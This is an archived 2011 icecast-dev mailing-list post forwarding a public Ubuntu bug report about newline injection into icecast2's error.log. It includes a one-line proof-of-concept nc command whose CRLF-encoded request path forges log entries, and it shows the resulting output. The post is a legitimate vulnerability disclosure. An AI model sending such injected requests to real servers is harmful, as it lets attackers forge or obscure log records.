[Icecast-dev] Security issue in icecast

Jamie Strandboge jamie at canonical.com
Thu Dec 15 10:25:40 PST 2011


A security bug was reported by Moritz Naumann against icecast in
Ubuntu. You are being emailed as the upstream contact. Please keep
oss-security at lists.openwall.com[1] CC'd for any updates on this issue.

This issue should be considered public and has not yet been assigned a
CVE.

Details from the public bug follow:
https://launchpad.net/bugs/894782

From the reporter:
"Newline injection in error.log

Running this command against an icecast2 running on 127.0.0.1...

echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d%
0a[1970-01-01%20%2000:00:00]%20PHUN%20I'm%20feeling%20phunny%0d%
0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN%
20fserve/fserve_client_create%20req%20for%20file%
20"'"'"/usr/share/icecast2/web/ HTTP/1.0\n\n" | nc -vv 127.0.0.1 8000
> /dev/null

...causes the following to be written to /var/log/icecast2/error.log:
[2011-11-25 15:37:31] INFO fserve/fserve_client_create checking for
file /non-existent" No such file or directory
[1970-01-01 00:00:00] PHUN I'm feeling phunny
..."

Thanks in advance for your cooperation in coordinating a fix for this
issue.

[1] oss-security at lists.openwall.com is a public mailing list for
    people to collaborate on security vulnerabilities and coordinate
    security updates.

-- 
Jamie Strandboge             | http://www.canonical.com
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 836 bytes
Desc: This is a digitally signed message part
Url : http://lists.xiph.org/pipermail/icecast-dev/attachments/20111215/4e9cc93c/attachment.pgp 


More information about the Icecast-dev mailing list